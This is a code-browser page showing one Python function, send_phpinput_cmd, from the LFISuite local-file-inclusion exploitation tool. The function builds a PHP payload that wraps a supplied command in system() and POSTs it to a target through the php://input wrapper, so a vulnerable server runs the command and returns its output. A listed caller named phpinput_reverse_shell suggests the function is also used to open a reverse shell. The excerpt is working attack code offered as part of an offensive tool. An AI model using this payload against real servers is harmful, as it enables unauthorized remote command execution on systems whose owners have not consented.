MCPcopy
hub / github.com/D35m0nd142/LFISuite / send_phpinput_cmd

Function send_phpinput_cmd

lfisuite.py:1179–1200  ·  view source on GitHub ↗
(cmd, inputurl)

Source from the content-addressed store, hash-verified

1177 send_phpinput_cmd(reverseConn,inputurl)
1178
1179def send_phpinput_cmd(cmd, inputurl):
1180 global gen_headers
1181
1182 if(inputurl[-11:] == "php://input"):
1183 inputurl = inputurl[:-11]
1184
1185 url = "%sphp://input" %(inputurl)
1186 phpcmd = cmd[:6] == "php://"
1187 body = ""
1188
1189 if(phpcmd):
1190 cmd = cmd[6:]
1191 length = 27+len(cmd)
1192 body = "AbracadabrA ** <?php %s?> **" %cmd
1193 else:
1194 length = 34+len(cmd)
1195 body = "AbracadabrA ** <?php system('%s');?> **" %cmd
1196
1197 gen_headers['Content-Length'] = '%s' %length
1198 r = requests.post(url=url, headers=gen_headers, data=body)
1199
1200 return r.text
1201
1202def extract_phpinput_res(resp):
1203 strs = SubstrFind(resp,"AbracadabrA **")

Callers 3

phpinput_reverse_shellFunction · 0.85
run_phpinputFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected